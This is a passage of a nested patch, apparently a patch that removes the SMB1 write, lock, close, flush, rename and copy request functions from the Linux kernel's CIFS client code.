+-	pSMB->DataLengthLow = cpu_to_le16(bytes_sent & 0xFFFF);
+-	pSMB->DataLengthHigh = cpu_to_le16(bytes_sent >> 16);
+-	inc_rfc1001_len(pSMB, byte_count);
+-
+-	if (wct == 14)
+-		pSMB->ByteCount = cpu_to_le16(byte_count);
+-	else { /* old style write has byte count 4 bytes earlier
+-		  so 4 bytes pad  */
+-		struct smb_com_writex_req *pSMBW =
+-			(struct smb_com_writex_req *)pSMB;
+-		pSMBW->ByteCount = cpu_to_le16(byte_count);
+-	}
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in write = %d\n", rc);
+-	} else {
+-		*nbytes = le16_to_cpu(pSMBr->CountHigh);
+-		*nbytes = (*nbytes) << 16;
+-		*nbytes += le16_to_cpu(pSMBr->Count);
+-
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned by the
+-		 * server is greater than bytes requested by the client. Some
+-		 * OS/2 servers are known to set incorrect CountHigh values.
+-		 */
+-		if (*nbytes > count)
+-			*nbytes &= 0xFFFF;
+-	}
+-
+-	cifs_buf_release(pSMB);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-/*
+- * Check the mid_state and signature on received buffer (if any), and queue the
+- * workqueue completion task.
+- */
+-static void
+-cifs_writev_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_writedata *wdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	unsigned int written;
+-	WRITE_RSP *smb = (WRITE_RSP *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		wdata->result = cifs_check_receive(mid, tcon->ses->server, 0);
+-		if (wdata->result != 0)
+-			break;
+-
+-		written = le16_to_cpu(smb->CountHigh);
+-		written <<= 16;
+-		written += le16_to_cpu(smb->Count);
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned
+-		 * by the server is greater than bytes requested by the
+-		 * client. OS/2 servers are known to set incorrect
+-		 * CountHigh values.
+-		 */
+-		if (written > wdata->bytes)
+-			written &= 0xFFFF;
+-
+-		if (written < wdata->bytes)
+-			wdata->result = -ENOSPC;
+-		else
+-			wdata->bytes = written;
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		wdata->result = -EAGAIN;
+-		break;
+-	default:
+-		wdata->result = -EIO;
+-		break;
+-	}
+-
+-	queue_work(cifsiod_wq, &wdata->work);
+-	release_mid(mid);
+-	add_credits(tcon->ses->server, &credits, 0);
+-}
+-
+-/* cifs_async_writev - send an async write, and set up mid to handle result */
+-int
+-cifs_async_writev(struct cifs_writedata *wdata,
+-		  void (*release)(struct kref *kref))
+-{
+-	int rc = -EACCES;
+-	WRITE_REQ *smb = NULL;
+-	int wct;
+-	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { };
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
+-		wct = 14;
+-	} else {
+-		wct = 12;
+-		if (wdata->offset >> 32 > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **)&smb);
+-	if (rc)
+-		goto async_writev_out;
+-
+-	smb->hdr.Pid = cpu_to_le16((__u16)wdata->pid);
+-	smb->hdr.PidHigh = cpu_to_le16((__u16)(wdata->pid >> 16));
+-
+-	smb->AndXCommand = 0xFF;	/* none */
+-	smb->Fid = wdata->cfile->fid.netfid;
+-	smb->OffsetLow = cpu_to_le32(wdata->offset & 0xFFFFFFFF);
+-	if (wct == 14)
+-		smb->OffsetHigh = cpu_to_le32(wdata->offset >> 32);
+-	smb->Reserved = 0xFFFFFFFF;
+-	smb->WriteMode = 0;
+-	smb->Remaining = 0;
+-
+-	smb->DataOffset =
+-	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-
+-	/* 4 for RFC1001 length + 1 for BCC */
+-	iov[0].iov_len = 4;
+-	iov[0].iov_base = smb;
+-	iov[1].iov_len = get_rfc1002_length(smb) + 1;
+-	iov[1].iov_base = (char *)smb + 4;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-	rqst.rq_pages = wdata->pages;
+-	rqst.rq_offset = wdata->page_offset;
+-	rqst.rq_npages = wdata->nr_pages;
+-	rqst.rq_pagesz = wdata->pagesz;
+-	rqst.rq_tailsz = wdata->tailsz;
+-
+-	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
+-
+-	smb->DataLengthLow = cpu_to_le16(wdata->bytes & 0xFFFF);
+-	smb->DataLengthHigh = cpu_to_le16(wdata->bytes >> 16);
+-
+-	if (wct == 14) {
+-		inc_rfc1001_len(&smb->hdr, wdata->bytes + 1);
+-		put_bcc(wdata->bytes + 1, &smb->hdr);
+-	} else {
+-		/* wct == 12 */
+-		struct smb_com_writex_req *smbw =
+-				(struct smb_com_writex_req *)smb;
+-		inc_rfc1001_len(&smbw->hdr, wdata->bytes + 5);
+-		put_bcc(wdata->bytes + 5, &smbw->hdr);
+-		iov[1].iov_len += 4; /* pad bigger by four bytes */
+-	}
+-
+-	kref_get(&wdata->refcount);
+-	rc = cifs_call_async(tcon->ses->server, &rqst, NULL,
+-			     cifs_writev_callback, NULL, wdata, 0, NULL);
+-
+-	if (rc == 0)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	else
+-		kref_put(&wdata->refcount, release);
+-
+-async_writev_out:
+-	cifs_small_buf_release(smb);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	      unsigned int *nbytes, struct kvec *iov, int n_vec)
+-{
+-	int rc;
+-	WRITE_REQ *pSMB = NULL;
+-	int wct;
+-	int smb_hdr_len;
+-	int resp_buf_type = 0;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-	struct kvec rsp_iov;
+-
+-	*nbytes = 0;
+-
+-	cifs_dbg(FYI, "write2 at %lld %d bytes\n", (long long)offset, count);
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES) {
+-		wct = 14;
+-	} else {
+-		wct = 12;
+-		if ((offset >> 32) > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-	rc = small_smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 14)
+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-	pSMB->Reserved = 0xFFFFFFFF;
+-	pSMB->WriteMode = 0;
+-	pSMB->Remaining = 0;
+-
+-	pSMB->DataOffset =
+-	    cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-
+-	pSMB->DataLengthLow = cpu_to_le16(count & 0xFFFF);
+-	pSMB->DataLengthHigh = cpu_to_le16(count >> 16);
+-	/* header + 1 byte pad */
+-	smb_hdr_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 1;
+-	if (wct == 14)
+-		inc_rfc1001_len(pSMB, count + 1);
+-	else /* wct == 12 */
+-		inc_rfc1001_len(pSMB, count + 5); /* smb data starts later */
+-	if (wct == 14)
+-		pSMB->ByteCount = cpu_to_le16(count + 1);
+-	else /* wct == 12 */ /* bigger pad, smaller smb hdr, keep offset ok */ {
+-		struct smb_com_writex_req *pSMBW =
+-				(struct smb_com_writex_req *)pSMB;
+-		pSMBW->ByteCount = cpu_to_le16(count + 5);
+-	}
+-	iov[0].iov_base = pSMB;
+-	if (wct == 14)
+-		iov[0].iov_len = smb_hdr_len + 4;
+-	else /* wct == 12 pad bigger by four bytes */
+-		iov[0].iov_len = smb_hdr_len + 8;
+-
+-	rc = SendReceive2(xid, tcon->ses, iov, n_vec + 1, &resp_buf_type, 0,
+-			  &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_writes);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error Write2 = %d\n", rc);
+-	} else if (resp_buf_type == 0) {
+-		/* presumably this can not happen, but best to be safe */
+-		rc = -EIO;
+-	} else {
+-		WRITE_RSP *pSMBr = (WRITE_RSP *)rsp_iov.iov_base;
+-		*nbytes = le16_to_cpu(pSMBr->CountHigh);
+-		*nbytes = (*nbytes) << 16;
+-		*nbytes += le16_to_cpu(pSMBr->Count);
+-
+-		/*
+-		 * Mask off high 16 bits when bytes written as returned by the
+-		 * server is greater than bytes requested by the client. OS/2
+-		 * servers are known to set incorrect CountHigh values.
+-		 */
+-		if (*nbytes > count)
+-			*nbytes &= 0xFFFF;
+-	}
+-
+-	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const __u16 netfid, const __u8 lock_type, const __u32 num_unlock,
+-	       const __u32 num_lock, LOCKING_ANDX_RANGE *buf)
+-{
+-	int rc = 0;
+-	LOCK_REQ *pSMB = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "cifs_lockv num lock %d num unlock %d\n",
+-		 num_lock, num_unlock);
+-
+-	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->Timeout = 0;
+-	pSMB->NumberOfLocks = cpu_to_le16(num_lock);
+-	pSMB->NumberOfUnlocks = cpu_to_le16(num_unlock);
+-	pSMB->LockType = lock_type;
+-	pSMB->AndXCommand = 0xFF; /* none */
+-	pSMB->Fid = netfid; /* netfid stays le */
+-
+-	count = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4 -
+-			 (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-	iov[1].iov_base = (char *)buf;
+-	iov[1].iov_len = (num_unlock + num_lock) * sizeof(LOCKING_ANDX_RANGE);
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-	rc = SendReceive2(xid, tcon->ses, iov, 2, &resp_buf_type,
+-			  CIFS_NO_RSP_BUF, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in cifs_lockv = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const __u16 smb_file_id, const __u32 netpid, const __u64 len,
+-	    const __u64 offset, const __u32 numUnlock,
+-	    const __u32 numLock, const __u8 lockType,
+-	    const bool waitFlag, const __u8 oplock_level)
+-{
+-	int rc = 0;
+-	LOCK_REQ *pSMB = NULL;
+-/*	LOCK_RSP *pSMBr = NULL; */ /* No response data other than rc to parse */
+-	int bytes_returned;
+-	int flags = 0;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "CIFSSMBLock timeout %d numLock %d\n",
+-		 (int)waitFlag, numLock);
+-	rc = small_smb_init(SMB_COM_LOCKING_ANDX, 8, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (lockType == LOCKING_ANDX_OPLOCK_RELEASE) {
+-		/* no response expected */
+-		flags = CIFS_NO_SRV_RSP | CIFS_NON_BLOCKING | CIFS_OBREAK_OP;
+-		pSMB->Timeout = 0;
+-	} else if (waitFlag) {
+-		flags = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
+-		pSMB->Timeout = cpu_to_le32(-1);/* blocking - do not time out */
+-	} else {
+-		pSMB->Timeout = 0;
+-	}
+-
+-	pSMB->NumberOfLocks = cpu_to_le16(numLock);
+-	pSMB->NumberOfUnlocks = cpu_to_le16(numUnlock);
+-	pSMB->LockType = lockType;
+-	pSMB->OplockLevel = oplock_level;
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = smb_file_id; /* netfid stays le */
+-
+-	if ((numLock != 0) || (numUnlock != 0)) {
+-		pSMB->Locks[0].Pid = cpu_to_le16(netpid);
+-		/* BB where to store pid high? */
+-		pSMB->Locks[0].LengthLow = cpu_to_le32((u32)len);
+-		pSMB->Locks[0].LengthHigh = cpu_to_le32((u32)(len>>32));
+-		pSMB->Locks[0].OffsetLow = cpu_to_le32((u32)offset);
+-		pSMB->Locks[0].OffsetHigh = cpu_to_le32((u32)(offset>>32));
+-		count = sizeof(LOCKING_ANDX_RANGE);
+-	} else {
+-		/* oplock break */
+-		count = 0;
+-	}
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	if (waitFlag)
+-		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMB, &bytes_returned);
+-	else
+-		rc = SendReceiveNoRsp(xid, tcon->ses, (char *)pSMB, flags);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Lock = %d\n", rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-	since file handle passed in no longer valid */
+-	return rc;
+-}
+-
+-int
+-CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
+-		const __u16 smb_file_id, const __u32 netpid,
+-		const loff_t start_offset, const __u64 len,
+-		struct file_lock *pLockData, const __u16 lock_type,
+-		const bool waitFlag)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
+-	struct cifs_posix_lock *parm_data;
+-	int rc = 0;
+-	int timeout = 0;
+-	int bytes_returned = 0;
+-	int resp_buf_type = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-
+-	cifs_dbg(FYI, "Posix Lock\n");
+-
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMBr = (struct smb_com_transaction2_sfi_rsp *)pSMB;
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	count = sizeof(struct cifs_posix_lock);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	if (pLockData)
+-		pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	else
+-		pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	parm_data = (struct cifs_posix_lock *)
+-			(((char *)pSMB) + offset + 4);
+-
+-	parm_data->lock_type = cpu_to_le16(lock_type);
+-	if (waitFlag) {
+-		timeout = CIFS_BLOCKING_OP; /* blocking operation, no timeout */
+-		parm_data->lock_flags = cpu_to_le16(1);
+-		pSMB->Timeout = cpu_to_le32(-1);
+-	} else
+-		pSMB->Timeout = 0;
+-
+-	parm_data->pid = cpu_to_le32(netpid);
+-	parm_data->start = cpu_to_le64(start_offset);
+-	parm_data->length = cpu_to_le64(len);  /* normalize negative numbers */
+-
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = smb_file_id;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_LOCK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	if (waitFlag) {
+-		rc = SendReceiveBlockingLock(xid, tcon, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMBr, &bytes_returned);
+-	} else {
+-		iov[0].iov_base = (char *)pSMB;
+-		iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-		rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovecs */,
+-				&resp_buf_type, timeout, &rsp_iov);
+-		pSMBr = (struct smb_com_transaction2_sfi_rsp *)rsp_iov.iov_base;
+-	}
+-	cifs_small_buf_release(pSMB);
+-
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in Posix Lock = %d\n", rc);
+-	} else if (pLockData) {
+-		/* lock structure can be returned on get */
+-		__u16 data_offset;
+-		__u16 data_count;
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(*parm_data)) {
+-			rc = -EIO;      /* bad smb */
+-			goto plk_err_exit;
+-		}
+-		data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-		data_count  = le16_to_cpu(pSMBr->t2.DataCount);
+-		if (data_count < sizeof(struct cifs_posix_lock)) {
+-			rc = -EIO;
+-			goto plk_err_exit;
+-		}
+-		parm_data = (struct cifs_posix_lock *)
+-			((char *)&pSMBr->hdr.Protocol + data_offset);
+-		if (parm_data->lock_type == cpu_to_le16(CIFS_UNLCK))
+-			pLockData->fl_type = F_UNLCK;
+-		else {
+-			if (parm_data->lock_type ==
+-					cpu_to_le16(CIFS_RDLCK))
+-				pLockData->fl_type = F_RDLCK;
+-			else if (parm_data->lock_type ==
+-					cpu_to_le16(CIFS_WRLCK))
+-				pLockData->fl_type = F_WRLCK;
+-
+-			pLockData->fl_start = le64_to_cpu(parm_data->start);
+-			pLockData->fl_end = pLockData->fl_start +
+-				(le64_to_cpu(parm_data->length) ?
+-				 le64_to_cpu(parm_data->length) - 1 : 0);
+-			pLockData->fl_pid = -le32_to_cpu(parm_data->pid);
+-		}
+-	}
+-
+-plk_err_exit:
+-	free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-	   since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-
+-int
+-CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
+-{
+-	int rc = 0;
+-	CLOSE_REQ *pSMB = NULL;
+-	cifs_dbg(FYI, "In CIFSSMBClose\n");
+-
+-/* do not retry on dead session on close */
+-	rc = small_smb_init(SMB_COM_CLOSE, 3, tcon, (void **) &pSMB);
+-	if (rc == -EAGAIN)
+-		return 0;
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = (__u16) smb_file_id;
+-	pSMB->LastWriteTime = 0xFFFFFFFF;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_closes);
+-	if (rc) {
+-		if (rc != -EINTR) {
+-			/* EINTR is expected when user ctl-c to kill app */
+-			cifs_dbg(VFS, "Send error in Close = %d\n", rc);
+-		}
+-	}
+-
+-	/* Since session is dead, file will be closed on server already */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
+-{
+-	int rc = 0;
+-	FLUSH_REQ *pSMB = NULL;
+-	cifs_dbg(FYI, "In CIFSSMBFlush\n");
+-
+-	rc = small_smb_init(SMB_COM_FLUSH, 1, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = (__u16) smb_file_id;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_flushes);
+-	if (rc)
+-		cifs_dbg(VFS, "Send error in Flush = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *from_name, const char *to_name,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	RENAME_REQ *pSMB = NULL;
+-	RENAME_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBRename\n");
+-renameRetry:
+-	rc = smb_init(SMB_COM_RENAME, 1, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->BufferFormat = 0x04;
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
+-					      from_name, PATH_MAX,
+-					      cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-		pSMB->OldFileName[name_len] = 0x04;	/* pad */
+-	/* protocol requires ASCII signature byte on Unicode string */
+-		pSMB->OldFileName[name_len + 1] = 0x00;
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       to_name, PATH_MAX, cifs_sb->local_nls,
+-				       remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2;	/* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, from_name);
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
+-		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
+-		name_len2++;	/* signature byte */
+-	}
+-
+-	count = 1 /* 1st signature byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_renames);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in rename = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto renameRetry;
+-
+-	return rc;
+-}
+-
+-int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *pTcon,
+-		int netfid, const char *target_name,
+-		const struct nls_table *nls_codepage, int remap)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
+-	struct set_file_rename *rename_info;
+-	char *data_offset;
+-	char dummy_string[30];
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int len_of_str;
+-	__u16 params, param_offset, offset, count, byte_count;
+-
+-	cifs_dbg(FYI, "Rename to File by handle\n");
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, pTcon, (void **) &pSMB,
+-			(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)(pSMB) + offset + 4;
+-	rename_info = (struct set_file_rename *) data_offset;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	/* construct random name ".cifs_tmp<inodenum><mid>" */
+-	rename_info->overwrite = cpu_to_le32(1);
+-	rename_info->root_fid  = 0;
+-	/* unicode only call */
+-	if (target_name == NULL) {
+-		sprintf(dummy_string, "cifs%x", pSMB->hdr.Mid);
+-		len_of_str =
+-			cifsConvertToUTF16((__le16 *)rename_info->target_name,
+-					dummy_string, 24, nls_codepage, remap);
+-	} else {
+-		len_of_str =
+-			cifsConvertToUTF16((__le16 *)rename_info->target_name,
+-					target_name, PATH_MAX, nls_codepage,
+-					remap);
+-	}
+-	rename_info->target_name_len = cpu_to_le32(2 * len_of_str);
+-	count = sizeof(struct set_file_rename) + (2 * len_of_str);
+-	byte_count += count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->Fid = netfid;
+-	pSMB->InformationLevel =
+-		cpu_to_le16(SMB_SET_FILE_RENAME_INFORMATION);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, pTcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&pTcon->stats.cifs_stats.num_t2renames);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Rename (by file handle) = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *fromName, const __u16 target_tid, const char *toName,
+-	    const int flags, const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc = 0;
+-	COPY_REQ *pSMB = NULL;
+-	COPY_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-
+-	cifs_dbg(FYI, "In CIFSSMBCopy\n");
+-copyRetry:
+-	rc = smb_init(SMB_COM_COPY, 1, tcon, (void **) &pSMB,
+-			(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->BufferFormat = 0x04;
+-	pSMB->Tid2 = target_tid;
+-
+-	pSMB->Flags = cpu_to_le16(flags & COPY_TREE);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
+-					      fromName, PATH_MAX, nls_codepage,
+-					      remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-		pSMB->OldFileName[name_len] = 0x04;     /* pad */
+-		/* protocol requires ASCII signature byte on Unicode string */
+-		pSMB->OldFileName[name_len + 1] = 0x00;
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       toName, PATH_MAX, nls_codepage, remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2; /* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, fromName);
+-		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, toName);
+-		name_len2++;    /* signature byte */
+-	}
+-
+-	count = 1 /* 1st signature byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in copy = %d with %d files copied\n",
+-			 rc, le16_to_cpu(pSMBr->CopyCount));
+-	}
+-	cifs_buf_release(pSMB);
+-
